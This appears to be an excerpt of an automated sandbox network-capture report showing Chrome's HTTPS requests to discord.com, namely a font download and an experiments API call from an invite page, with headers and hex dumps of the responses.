                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/assets/69646.32a83a0c7e0a41f066e8.css
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC956INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                                                                                    Content-Length: 137140
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0b3884342a0-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "f9bf0f65660d23c6f359d22720fc55ae"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 06 Jan 2023 01:15:24 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDvnwmMCyrtXHkMm2KHQgUFTItMGnBDhAWjTxgsbaVTV1BSNSnJUZtTzFiNVQg5MmbPsDBYJrkm2Svjum%2BpZDgSW81XUyD493YaEBWFiQcEsa2T7Q%2FH3C6rgYJuT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC413INData Raw: 77 4f 46 32 00 01 00 00 00 02 17 b4 00 0f 00 00 00 06 30 cc 00 02 17 55 00 02 01 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 8b 66 1b 84 bd 1a 1c d3 04 06 60 00 95 1a 11 08 0a 8e fc 24 8c 87 55 01 36 02 24 03 f3 54 0b f3 58 00 04 20 05 8b 14 07 82 bd 5b 0c 07 5b 9e 3b b5 0f fe 9b 8c fd 77 db 4e ad 83 0c c8 a5 5a 6a 55 00 00 95 5d 22 de 75 91 12 24 0f 6b b7 d9 3c f8 97 31 d6 db e0 33 40 69 96 9d 1d 36 0e 49 d7 a5 58 99 f1 af 1e c1 c9 d8 40 79 64 66 e7 68 23 cf 0a 15 d7 e7 1b fe ff ff ff ff ff ff ff ff ff ff ff 7b 49 7e 3c 3a f5 dd 49 ba fb 43 5f 0b 90 c4 b2 01 01 06 03 c6 23 f1 ae 5d 37 69 e3 c4 71 5b 08 2b 50 46 8c 55 e2 c4 c0 78 ef 1d 1c 9c a6 10 18 31 2e 18 62 05 ea 33 31 56 61 a8 98 bc c8 61 42 89 ca e4 ae d7 1f a0 6e d8 56 d8 a1
                                                                                                                                                                                                                                                                                    Data Ascii: wOF20Uf`$U6$TX [[;wNZjU]"u$k<13@i6IX@ydfh#{I~<:IC_#]7iq[+PFUx1.b31VaaBnV
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: dc bd 9f 08 0e 07 58 3c 3c 92 b4 b5 b0 d4 40 91 51 3d e7 db de 04 f3 eb cd a8 ec fa 3a a4 12 c3 1d 2b f1 ed 8a c9 14 46 b1 cf 7a e8 a5 95 4b da 13 59 85 e7 7b 74 a4 2e 7b c7 2a b3 70 7f b0 22 b1 49 0c 8f ec dd 0b e9 4d eb 58 7c 74 17 dd fb 1e a3 9a b7 c8 88 7d 8d ef cf d8 de e8 94 6e 6b 34 32 8b e6 12 53 5c 91 1e b9 1b b4 24 48 bb 19 c6 30 8a ff 9a 6d c7 05 ab 09 fc 0b 23 66 3e 45 55 11 fb 2d 7a cd 6b 7c fe b5 20 0f 85 59 17 27 e5 f4 3b 3c 3f 97 f8 e7 ec df 0f dc 53 82 43 ff 1f d9 8c 15 9b c9 8f f5 e9 96 b4 fc 05 1c a7 10 0c 98 77 65 55 22 df b2 c7 9f f9 45 53 ed 32 04 3e e5 25 f6 bb 1a 4f 8d d2 ba 71 f3 a2 40 83 d2 a9 bb 85 46 18 e6 ce 30 e6 97 61 52 a8 46 7c 5b 61 dd 97 12 56 71 fa 8c c6 7a 7c 48 51 5f 6d 2d 6a 81 33 78 31 d5 91 58 58 db 95 70 d6 f5 fd
                                                                                                                                                                                                                                                                                    Data Ascii: X<<@Q=:+FzKY{t.{*p"IMX|t}nk42S\$H0m#f>EU-zk| Y';<?SCweU"ES2>%Oq@F0aRF|[aVqz|HQ_m-j3x1XXp
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 47 b0 d5 ab 4a c7 13 ea 9e ba 36 04 28 6a 13 bc 05 10 cd e4 e3 6a bc a8 53 85 ff f8 fd fe f7 fe 9b 99 7b ae ad 7d ad 7d 71 4c 92 99 37 4a 20 45 32 8d 92 20 d1 5d 4b 60 62 bf 87 89 77 d3 c4 11 1a 09 7f e6 f6 c5 11 f7 64 da 88 e4 c5 d5 dd 4a 30 e2 df 5b 3a c9 bc 29 6c 3f 75 42 0b 52 04 af cf c8 fd 64 47 d3 6e 28 e4 25 94 45 39 e4 a9 f6 90 06 e1 c1 53 a4 d1 22 17 ae 4f 60 94 d4 05 15 19 9a 76 3c 96 0c 47 01 e7 6c e3 cc 4e 68 fd ef f7 0b b5 90 69 84 f2 f3 cb 37 72 36 2f 92 36 0f 62 83 a4 41 6c f0 77 16 31 a6 83 19 0d 67 69 40 10 80 ea f4 f3 ca 40 39 55 4d 17 16 1d 8b e4 2f 75 fa 61 4c c7 de ca 14 64 0f ce 24 9f 22 44 89 06 8b 3f fa a7 fa f6 e7 b6 d9 e9 7d cc df 52 ea b0 49 e9 fd e6 d2 97 e1 fb b0 d3 aa 05 16 58 e9 8f b3 c0 ba 52 2d 90 40 86 23 fe f1 f6 a6 fb
                                                                                                                                                                                                                                                                                    Data Ascii: GJ6(jjS{}}qL7J E2 ]K`bwdJ0[:)l?uBRdGn(%E9S"O`v<GlNhi7r6/6bAlw1gi@@9UM/uaLd$"D?}RIXR-@#
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: fb 3b 6b a0 c3 b7 e4 20 0b ec 46 d2 07 94 60 bf a2 83 84 23 d3 21 62 8c db 09 f7 0a 01 46 a4 1e 8c c0 29 e0 ce d8 1d c0 93 1c 6a 45 e8 2d 52 bb 48 dd 4b 87 cc 04 4f ce 87 63 df 8e 7b 9c 10 3d bd f9 ba c7 c3 1c f7 72 9c e3 1e 8e 93 c2 7d 3a 3f db 9d 2f cd 9d f4 4f 7a 1f 36 44 0e 42 df 59 33 b3 2b af a5 b1 3f e9 c0 8a 42 0e f9 7e 98 e4 43 a8 02 45 93 3a 45 77 2f 15 56 48 98 4e c4 01 0f 07 b9 75 52 29 9a 96 50 ec 86 cd ff 34 35 5b 7c 01 b8 11 75 21 f1 ca b3 5d 94 2e 4a 7a e7 d6 39 d6 a9 28 45 3c 04 53 bb 2b 3a e5 f2 c6 bd 3d 3d 3f 3e 97 23 61 c9 19 93 0e 21 34 4d 65 88 6c cb 78 84 a4 0a 6d ab d4 cd ec 01 db f7 13 b2 a9 31 e4 6c b3 05 16 6a 80 ff ff f6 7b b5 1f ee 0e ce b4 ac ba aa fc 9f 5f 96 71 f2 c1 4c f0 bc 94 6e f8 15 50 d5 82 04 b4 a9 0a 08 d3 55 e3 08
                                                                                                                                                                                                                                                                                    Data Ascii: ;k F`#!bF)jE-RHKOc{=r}:?/Oz6DBY3+?B~CE:Ew/VHNuR)P45[|u!].Jz9(E<S+:==?>#a!4Melxm1lj{_qLnPU
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 2d 53 6f bd 26 5b f5 3a 15 a2 33 1d df fa 6a 69 ab 81 0e 18 ef 24 52 49 16 ba 64 bd e9 e6 b4 df 70 23 94 73 27 db 79 0e af 60 14 f6 e5 91 ae e5 d6 31 44 ff fe b2 66 f4 9a d5 de 00 7a 53 6c b5 fa bd d5 a7 a1 33 9f e6 db 07 7e 79 43 9e 3a 7f 24 7d c2 51 78 72 c1 b7 9e f9 c6 2b 63 79 bb 67 d5 fe 10 c7 c2 9d 0c 83 2d e0 f6 b7 2e 80 65 7f 07 90 ac 5a 29 6a aa 3c 22 52 5a e4 8d 9a 93 09 38 a2 75 34 c4 dc eb 65 03 1b de e9 3b b0 83 60 4b c7 dd a7 d8 b0 d7 91 65 e3 e4 c2 6c 3c d8 0c 8f 10 59 14 0e 06 aa a3 2d a7 e7 de a3 a7 40 89 50 e5 7e 5a 7e 0b 0c c1 7a b7 0b cb 76 3b b0 fc b7 6d 28 00 50 32 c5 df 50 93 ef 56 9b 93 a6 27 cd 15 28 4b 17 45 67 24 a2 46 f3 1c a7 2f 2c 4b 27 a1 10 d9 b2 c1 27 09 02 d2 01 fd 7f bf ea 90 6d 38 f6 26 85 f6 1c 66 d1 8e 43 5e ce c4 d9
                                                                                                                                                                                                                                                                                    Data Ascii: -So&[:3ji$RIdp#s'y`1DfzSl3~yC:$}Qxr+cyg-.eZ)j<"RZ8u4e;`Kel<Y-@P~Z~zv;m(P2PV'(KEg$F/,K''m8&fC^
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: bf aa 18 fd ba 11 51 dd 23 f2 e7 73 e7 97 3b f3 cf e2 a7 28 19 3b f3 4d ee 94 97 6a b4 43 d9 9c 78 55 01 e9 f7 b5 d3 6b 86 63 d8 62 f8 ac 8c 07 19 e9 9b 9a d1 c6 1e 41 b8 79 b6 aa 75 fd 93 61 3d de 67 3a 58 ac e4 74 90 b2 f8 a9 2b 8c a0 6a 87 c3 48 94 e1 9b 10 79 60 ca 43 a6 b6 5e b4 04 ef ed 88 bf 05 32 54 30 ff 7f f0 c5 b3 4b b6 6f 77 ef 07 28 07 f5 07 b3 fe e1 6d cc b7 95 1f 78 7b e7 22 5e b9 0f 6b f9 33 d8 d6 9c f8 e0 d1 c5 fd 5b b9 c9 d2 25 f4 f5 6a 07 b4 a1 7e 1d 1c 7d 73 0f 9f d6 d9 5a ae 1c 16 76 ca e8 b2 4e f5 69 94 4f 76 9f e9 47 e7 a2 79 27 64 15 e9 af 28 f7 19 ff 5d 2f b1 86 42 9b 4b 29 52 3a 95 d6 01 d0 aa c1 29 3c b1 6d 34 3c e9 80 b3 81 ef f7 10 66 1e d0 fe 07 71 db 96 d7 fe e6 16 d2 83 2e df d3 e8 5f 38 a5 d0 39 0b cd fb 98 52 f3 c1 c0 ff
                                                                                                                                                                                                                                                                                    Data Ascii: Q#s;(;MjCxUkcbAyua=g:Xt+jHy`C^2T0Kow(mx{"^k3[%j~}sZvNiOvGy'd(]/BK)R:)<m4<fq._89R
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 5e ee 25 46 38 0e f6 94 40 ee e9 09 67 2e 37 4d d3 b3 f6 37 e3 ad f6 5b f4 a2 51 e4 8a 5a a2 87 97 b5 c0 4d 44 4d 12 d0 e5 0d 21 5c 5f 2f f9 73 3d ca 23 d8 c8 83 fb 90 b5 9a 97 7c 93 e1 e7 34 5d 65 3b 4d 47 b5 aa 57 98 c7 97 f3 70 b7 68 bf 99 7d ab 94 5b 6d ef 07 e7 ee 04 f4 fc 33 21 38 58 b7 59 fe b7 8a 99 86 52 5a cd 1c 29 76 0e 33 67 c7 93 e7 3e 95 19 cf 3b 35 71 7e 46 8b 03 61 7c b3 ec 36 ba e8 f3 03 87 57 5c 9e 95 e8 19 6a de 44 a4 90 d3 b8 d4 a2 33 24 17 bc 59 a0 45 c5 18 79 3c 3c 19 1e 09 4f 63 57 30 e1 5a dc 14 07 7b 87 2e 2b ae fd 25 38 5e 4e 39 9c 01 4e 04 5e 22 41 58 92 af bf 15 73 7e db fa d4 f1 4b e3 6e dc 70 c0 c8 fc 4f 02 99 27 18 2d 93 65 ef 89 f6 67 64 78 7a 6a c3 a1 57 e8 43 30 05 30 a3 19 88 b6 8a 8e 7e 01 45 54 a0 41 87 01 13 16 6c 38
                                                                                                                                                                                                                                                                                    Data Ascii: ^%F8@g.7M7[QZMDM!\_/s=#|4]e;MGWph}[m3!8XYRZ)v3g>;5q~Fa|6W\jD3$YEy<<OcW0Z{.+%8^N9N^"AXs~KnpO'-egdxzjWC00~ETAl8
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 10 45 76 52 1c d5 69 69 31 ee 91 17 e5 5e 45 12 f7 29 c3 ba 5f 1d d9 03 9a a2 9c d7 8d ec 41 c3 30 2e 1b 57 e4 61 93 a2 5d 31 4d e2 11 b3 a8 1e b3 88 ec 71 cb b0 9e b2 09 eb 69 f5 ad f3 ac c6 d6 79 4e 73 bd 6b 5a db e7 ba 8e 26 dd d0 d5 a4 d7 f4 37 e7 4d c3 e1 3b 23 ed 74 db 68 f8 d1 78 3b bd 6b a2 59 ef 99 0c bf 98 6a ce 1d d3 75 3e 32 5b e7 63 a4 96 7d 6a be 65 9f 59 0c 59 96 9b f4 a5 95 76 fa ca 6a 93 fe 63 b3 69 ff b5 dd b2 ef f5 06 fc 60 e4 f2 a3 99 d3 cf a0 a8 5f 60 2d bf a2 82 7e c3 d1 ee 91 82 fe a0 d1 1e b0 82 fe e2 d1 1e 89 1c fe 2f a3 f9 94 19 70 07 aa c3 0b 51 8f 52 88 06 f1 86 69 88 12 2a 4a ce f5 d1 b2 ef c9 c5 35 9e ac 6f 93 29 d0 2c 20 61 08 0a 1b 43 e2 a6 b0 80 35 c6 da 13 d4 91 d4 71 a6 5c e8 b4 88 3b a3 e6 c9 a9 a7 e5 6d 85 82 7a 7a d1
                                                                                                                                                                                                                                                                                    Data Ascii: EvRii1^E)_A0.Wa]1MqiyNskZ&7M;#thx;kYju>2[c}jeYYvjci`_`-~/pQRi*J5o), aC5q\;mzz
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 84 69 a9 91 37 1e 30 a1 33 48 3b 46 74 7f 12 36 09 6b 47 c2 24 49 db 28 62 12 66 0e 47 12 b2 49 58 35 49 40 c3 a1 10 49 82 62 45 d7 49 fb 64 13 26 8a b8 1e 8e c1 22 18 79 b1 c7 79 d7 ca b2 30 8a 58 18 f2 59 64 0a 96 57 19 36 0b 96 23 5c 30 9f f0 19 6c 26 a3 88 6c 84 0b 16 2e 38 dc 29 b8 e9 c7 b9 0e 0a 77 28 12 e9 0c 0e ca 3e cb 05 bd 38 c1 05 03 c7 45 31 29 9e 70 2d 9e a7 5b 4b 9e 6b cd bb d6 da ee c5 91 7a 31 2c b1 7e aa e7 f8 8a 4d f7 95 5d 34 e7 0d 43 39 9a a2 e3 a8 d5 1f 8c 75 71 ab c8 d6 e9 7e b3 8b d6 fb d0 6c 5e 4d dd e2 93 9d 2f b4 06 ff 1a 79 36 64 db 1c fc 9b 96 5c 6f cd f9 6e e4 e6 c8 23 66 88 c1 3c 61 40 08 c1 83 e5 c1 f2 60 d9 b0 bb 3a 0b 8d b2 c0 41 86 4e 89 1d 03 b7 2a ac c1 2a a2 a1 47 51 0d 62 f1 a8 ab 7d ec d1 46 ab df fd a1 43 52 c1 e9
                                                                                                                                                                                                                                                                                    Data Ascii: i703H;Ft6kG$I(bfGIX5I@IbEId&"yy0XYdW6#\0l&l.8)w(>8E1)p-[Kkz1,~M]4C9uq~l^M/y6d\on#f<a@`:AN**GQb}FCR
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:38 UTC1369INData Raw: 54 27 15 06 07 39 51 01 90 da a4 c6 75 63 7c 11 68 c4 56 c0 78 fc a0 6b 04 9e 85 17 3b cf bd 23 bf 1c 78 fb 5d e2 e5 71 90 80 4d e8 74 e8 13 f1 13 0e 92 c2 87 a2 18 dc f1 f6 cc 09 cf 8e 8b 0e 5e 02 16 0a 82 d2 84 81 8f 10 27 45 96 02 65 ae 5e 53 78 53 37 1d b4 f4 04 7c 10 96 1a 91 fb 62 79 cd f2 09 fc d8 1e 2c 8c 5d 32 e1 8f 82 28 0c 07 f1 40 6d a9 92 29 84 26 af 88 bd 03 bc b1 cd 0a 7d 52 25 a5 74 60 c4 e2 f6 2a 2e bc 5d 40 d0 34 71 f0 86 02 b5 eb da 3c 65 16 bb e7 69 c7 1a 16 ac 6d 5b f8 b3 09 11 89 8e 74 10 4c 57 62 de ca a8 e9 03 7f 25 ab 82 28 27 77 e3 9e d1 99 00 d4 37 90 68 3f a4 08 c8 10 26 99 3a d3 ab 88 cd 02 f2 ac 4b 5b 6b 56 b4 6d 04 4e d3 89 b3 b1 66 40 94 65 e6 5b 8f c0 25 55 5f 0a 97 f9 88 bd a7 57 16 32 81 19 64 dc e8 36 e9 12 bd 49 23 1a
                                                                                                                                                                                                                                                                                    Data Ascii: T'9Quc|hVxk;#x]qMt^'Ee^SxS7|by,]2(@m)&}R%t`*.]@4q<eim[tLWb%('w7h?&:K[kVmNf@e[%U_W2d6I#


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    47192.168.2.549774162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:39 UTC1632OUTGET /api/v9/experiments?with_guild_experiments=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjM0NzY5MSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                                                                                                                                                                                                                                    X-Context-Properties: eyJsb2NhdGlvbiI6IkFjY2VwdCBJbnZpdGUgUGFnZSJ9
                                                                                                                                                                                                                                                                                    X-Debug-Options: bugReporterEnabled
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    X-Discord-Timezone: America/New_York
                                                                                                                                                                                                                                                                                    X-Discord-Locale: en-US
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC772INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    via: 1.1 google
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ff9uqYYfBOo1cain8uAulMteasVxWr6qa8X1EIVipO7Xp%2BedqwC09EFZquEdKBQHgResHoZ7sWV27uscWQd%2FaqKEN0fSrMNWlWDd3PuJ6%2BN0DDPUz%2FfyptxsfedK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0beac3a4385-EWR
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC597INData Raw: 37 63 39 66 0d 0a 7b 22 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 33 30 39 39 37 34 39 32 35 34 32 33 31 35 33 32 39 34 2e 34 32 43 65 30 38 61 39 77 54 68 6e 6c 52 54 6f 54 6e 4e 6c 6d 76 76 4c 55 78 49 22 2c 22 61 73 73 69 67 6e 6d 65 6e 74 73 22 3a 5b 5b 32 38 31 30 32 30 35 34 38 37 2c 31 2c 31 2c 2d 31 2c 33 2c 31 33 34 34 2c 30 2c 30 5d 2c 5b 32 36 31 37 32 31 38 34 34 34 2c 34 2c 31 2c 2d 31 2c 32 2c 37 31 39 2c 30 2c 30 5d 2c 5b 33 30 33 35 36 37 34 37 36 37 2c 30 2c 31 2c 2d 31 2c 30 2c 32 32 34 31 2c 30 2c 30 5d 2c 5b 31 36 30 39 37 38 32 31 35 31 2c 30 2c 31 2c 2d 31 2c 32 2c 35 39 33 32 2c 30 2c 30 5d 2c 5b 33 36 34 33 33 36 32 37 35 31 2c 30 2c 31 2c 2d 31 2c 30 2c 35 30 35 36 2c 30 2c 30 5d 2c 5b 33 37 35 33 30 33 34 34 36 36 2c 31 2c 32
                                                                                                                                                                                                                                                                                    Data Ascii: 7c9f{"fingerprint":"1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxI","assignments":[[2810205487,1,1,-1,3,1344,0,0],[2617218444,4,1,-1,2,719,0,0],[3035674767,0,1,-1,0,2241,0,0],[1609782151,0,1,-1,2,5932,0,0],[3643362751,0,1,-1,0,5056,0,0],[3753034466,1,2
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 31 2c 30 2c 32 30 37 2c 30 2c 30 5d 2c 5b 33 35 35 37 34 38 30 37 31 32 2c 30 2c 31 2c 2d 31 2c 30 2c 38 37 36 34 2c 30 2c 30 5d 2c 5b 38 35 33 34 30 33 31 33 33 2c 34 2c 31 2c 2d 31 2c 30 2c 35 32 30 34 2c 30 2c 30 5d 2c 5b 32 34 39 31 30 30 35 30 31 39 2c 34 2c 31 2c 2d 31 2c 30 2c 35 36 35 35 2c 30 2c 30 5d 2c 5b 33 38 38 39 30 37 37 38 30 34 2c 32 2c 31 2c 2d 31 2c 30 2c 35 30 34 34 2c 30 2c 30 5d 2c 5b 34 30 37 39 32 31 34 33 31 39 2c 32 2c 31 2c 2d 31 2c 30 2c 37 39 30 32 2c 30 2c 30 5d 2c 5b 31 35 33 32 32 38 30 35 34 38 2c 31 36 2c 31 2c 2d 31 2c 35 2c 35 30 35 30 2c 30 2c 30 5d 2c 5b 31 30 39 35 37 37 39 31 35 34 2c 30 2c 31 2c 2d 31 2c 34 2c 35 34 33 39 2c 30 2c 30 5d 2c 5b 31 33 39 38 30 30 37 38 33 39 2c 30 2c 31 2c 2d 31 2c 32 2c 37 34 38 31
                                                                                                                                                                                                                                                                                    Data Ascii: 1,0,207,0,0],[3557480712,0,1,-1,0,8764,0,0],[853403133,4,1,-1,0,5204,0,0],[2491005019,4,1,-1,0,5655,0,0],[3889077804,2,1,-1,0,5044,0,0],[4079214319,2,1,-1,0,7902,0,0],[1532280548,16,1,-1,5,5050,0,0],[1095779154,0,1,-1,4,5439,0,0],[1398007839,0,1,-1,2,7481
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 31 2c 30 2c 31 2c 2d 31 2c 31 2c 31 31 33 31 2c 30 2c 30 5d 2c 5b 33 37 33 35 33 31 31 35 36 2c 30 2c 33 2c 2d 31 2c 30 2c 31 37 34 34 2c 30 2c 30 5d 2c 5b 32 34 32 39 32 31 36 30 35 39 2c 30 2c 31 2c 2d 31 2c 30 2c 39 37 31 36 2c 30 2c 30 5d 2c 5b 31 36 31 37 37 34 39 37 34 33 2c 30 2c 31 2c 2d 31 2c 30 2c 32 31 35 2c 30 2c 30 5d 2c 5b 32 39 33 37 33 32 39 39 31 30 2c 31 2c 31 2c 2d 31 2c 32 2c 37 38 37 31 2c 30 2c 30 5d 2c 5b 32 38 38 39 36 38 37 30 36 2c 30 2c 31 2c 2d 31 2c 33 2c 37 31 36 37 2c 30 2c 30 5d 2c 5b 31 30 34 35 37 33 30 32 30 33 2c 33 2c 31 2c 2d 31 2c 31 2c 36 39 31 35 2c 30 2c 30 5d 2c 5b 33 35 32 32 33 37 38 37 31 36 2c 30 2c 31 2c 2d 31 2c 31 2c 32 37 32 30 2c 30 2c 30 5d 2c 5b 32 30 39 31 32 30 32 35 37 34 2c 30 2c 31 2c 2d 31 2c 30
                                                                                                                                                                                                                                                                                    Data Ascii: 1,0,1,-1,1,1131,0,0],[373531156,0,3,-1,0,1744,0,0],[2429216059,0,1,-1,0,9716,0,0],[1617749743,0,1,-1,0,215,0,0],[2937329910,1,1,-1,2,7871,0,0],[288968706,0,1,-1,3,7167,0,0],[1045730203,3,1,-1,1,6915,0,0],[3522378716,0,1,-1,1,2720,0,0],[2091202574,0,1,-1,0
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:40 UTC1369INData Raw: 30 5d 2c 5b 33 39 35 30 38 34 37 35 33 37 2c 33 2c 31 2c 2d 31 2c 30 2c 31 33 33 31 2c 30 2c 30 5d 2c 5b 33 39 32 37 31 34 35 37 39 37 2c 30 2c 31 2c 2d 31 2c 33 2c 35 35 34 38 2c 30 2c 30 5d 2c 5b 32 32 34 30 30 39 38 30 32 35 2c 30 2c 31 2c 2d 31 2c 30 2c 36 33 36 39 2c 30 2c 31 5d 2c 5b 38 32 32 36 37 36 31 33 34 2c 32 2c 31 2c 2d 31 2c 30 2c 33 35 31 34 2c 30 2c 30 5d 2c 5b 31 38 39 34 32 38 38 31 31 33 2c 30 2c 32 2c 2d 31 2c 34 2c 38 31 39 32 2c 30 2c 30 5d 2c 5b 32 35 33 38 35 39 31 30 37 37 2c 30 2c 31 2c 2d 31 2c 36 2c 39 37 32 33 2c 30 2c 30 5d 2c 5b 32 30 35 33 31 36 32 38 32 31 2c 30 2c 31 2c 2d 31 2c 31 2c 33 35 35 39 2c 30 2c 30 5d 2c 5b 32 38 31 36 35 37 37 36 32 36 2c 30 2c 31 2c 2d 31 2c 32 2c 35 38 33 33 2c 30 2c 30 5d 2c 5b 31 35 38 30
